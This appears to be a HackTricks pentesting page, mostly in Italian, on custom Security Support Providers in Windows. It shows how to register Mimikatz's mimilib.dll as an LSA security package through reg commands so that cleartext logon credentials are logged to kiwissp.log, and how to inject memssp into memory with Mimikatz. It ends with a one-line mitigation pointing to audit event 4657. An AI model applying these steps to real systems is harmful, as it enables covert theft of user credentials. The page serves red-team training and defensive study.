hacktricks/windows-hardening/active-directory-methodology/custom-ssp.md

3.7 KiB

Custom SSP

{% hint style="success" %} Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks
{% endhint %}

Custom SSP

Learn what is a SSP (Security Support Provider) here.
Puoi creare il tuo SSP per catturare in testo chiaro le credenziali utilizzate per accedere alla macchina.

Mimilib

Puoi usare il file binario mimilib.dll fornito da Mimikatz. Questo registrerà all'interno di un file tutte le credenziali in testo chiaro.
Posiziona il dll in C:\Windows\System32\
Ottieni un elenco dei pacchetti di sicurezza LSA esistenti:

{% code title="attacker@target" %}

PS C:\> reg query hklm\system\currentcontrolset\control\lsa\ /v "Security Packages"

HKEY_LOCAL_MACHINE\system\currentcontrolset\control\lsa
Security Packages    REG_MULTI_SZ    kerberos\0msv1_0\0schannel\0wdigest\0tspkg\0pku2u

{% endcode %}

Aggiungi mimilib.dll alla lista dei fornitori di supporto per la sicurezza (Pacchetti di sicurezza):

reg add "hklm\system\currentcontrolset\control\lsa\" /v "Security Packages"

E dopo un riavvio, tutte le credenziali possono essere trovate in chiaro in C:\Windows\System32\kiwissp.log

In memoria

Puoi anche iniettare questo in memoria direttamente usando Mimikatz (nota che potrebbe essere un po' instabile/non funzionare):

privilege::debug
misc::memssp

Questo non sopravvivrà ai riavvii.

Mitigazione

ID evento 4657 - Audit creazione/modifica di HKLM:\System\CurrentControlSet\Control\Lsa\SecurityPackages

{% hint style="success" %} Impara e pratica il hacking AWS:HackTricks Training AWS Red Team Expert (ARTE)
Impara e pratica il hacking GCP: HackTricks Training GCP Red Team Expert (GRTE)

Supporta HackTricks
{% endhint %}